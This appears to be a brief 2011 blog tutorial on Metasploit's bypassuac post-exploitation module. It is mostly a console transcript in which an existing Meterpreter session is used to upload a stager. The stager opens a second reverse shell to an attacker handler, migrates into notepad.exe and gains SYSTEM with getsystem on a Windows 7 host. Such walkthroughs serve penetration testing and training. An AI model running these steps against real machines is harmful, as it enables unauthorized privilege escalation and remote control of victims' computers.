The Windows UAC bypass was committed to the Metasploit Framework today. It is a bit different from running your traditional script. Instead of interacting with meterpreter and executing the commands from the meterpreter shell, you need to use the new use post/ modules. Below is how to use it:

[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Th u Jan 06 12:40:35 -0500 2011

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS : Windows 7 (Build 7600, ).
Arch : x64 (Current Process is WOW64)
Language: en_US
meterpreter >